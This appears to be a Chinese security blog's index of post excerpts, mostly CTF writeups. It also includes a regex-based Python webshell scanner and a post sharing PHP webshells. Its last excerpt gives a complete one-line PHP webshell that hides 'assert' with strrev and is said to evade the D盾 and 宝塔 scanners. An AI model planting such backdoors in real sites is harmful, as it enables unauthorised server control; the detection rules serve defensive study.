无意中先刷一波bugku 的题目，赶紧还挺有意思的。 当碰到 一道php 反序列化的题目。看的一脸懵逼。可以读取到文件，但是无法理解拿flag 的操作。 后面大佬提点终于明白了，也引发了一些思考 ...

无意中在i春秋看了一篇文章   https://bbs.ichunqiu.com/thread-26617-1-1.html 刚好我本地弄了一个环境。

网鼎杯第四场，完全被虐着打，根本就打不过， 1、签到题 2、comment 爆破得到账号密码 zhangwei  zhangwei666 同时发现git 泄露 get 源代码。发现write_do.php 中很...

网鼎杯第三场wp 连续打了好几次网鼎杯这场是最累的。事在是太累了。到了五点半我实在是gang不住了。我请假回家了。emmmm 回去的路上我都感觉头晕难受 废话不多说了，直接上吧 1、签到题 ...

极客巅峰第二场wp 今天打了一场极客巅峰，因为第一场太忙了，没时间打，也错过了，今天的题目相对来说简单多了，比网鼎杯啥的。都比较简单。 CTF题目后续更新上去。我先上靶场题目。 1、 抛...

网鼎杯网络安全大赛-第二场Writeup 战队：DAFSEC 签到 falg{wangdingbei_nice} 2、套娃-misc  直接对第6张...

网鼎杯第一场WriteUP----china H.L.B 团队 1、签到题 回复1f5f2e进入下一关  2、Clip 下载题目是Disk 文件。第一反应是...

分享几个PHP 大马 这个是今天查马的过程中，搜集了一波=。=  那么上吧 <?php $GLOBALS['pass'] = "6d31b7d21395a26b8035fdd7b94bb070d5993de3";$func="cr"/*-/-*...

python 木马查杀工具 #coding-utf-8 #Coиdθr from sys import argv import os import re rule=['@\$\_\(\$\_', '\$\_=\"\"', '\${\'\_\'', '@preg\_replace\((\")*\/(\S)*\...

tools 看了下看过可以过D盾的。就看看过宝塔的效果 发现很有意思 <?php $arr = strrev('tressa'); $arr($_POST[strcspn('di', 'ke')]); ?> 密码2  ...